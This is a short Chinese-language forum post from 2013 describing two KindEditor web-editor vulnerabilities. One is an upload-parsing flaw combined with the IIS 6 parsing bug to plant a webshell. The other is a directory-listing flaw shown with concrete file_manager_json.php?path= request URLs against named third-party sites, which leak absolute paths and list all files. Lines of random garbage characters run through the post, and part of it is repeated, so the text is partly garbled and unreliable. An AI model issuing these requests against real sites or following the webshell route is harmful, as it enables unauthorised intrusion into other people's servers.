KindEditor上传解析漏洞 影响版本:= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 1.http://www.political-security.com/67cms/kindeditor/php/file_man
7 U; ~" _' l' H- c( ^. H7 S) v# V- \5 y
, d. o5 L0 c4 \1 ^. ^* O7 X KindEditor上传解析漏洞 影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL * m7 W( Y) K1 k$ A' `. T# n6 D
/ i: c, P3 [+ w; O
KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 - http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
- //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
- 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
- //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
- 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名: K0 o7 @2 C& e3 |' L: {0 b$ W
( y* N6 z- v4 ^# z5 W6 @. K
( v+ R; J! e, [' ~4 Z3 E
6 `( T, N9 ]. R4 ~9 _/ m. O. b- b3 ^
) Y" M; r$ e9 f7 Q! C5 z
j+ C4 k2 Z# B8 ~6 V
|
发表于 2013-1-23 09:16:19
收藏
支持
反对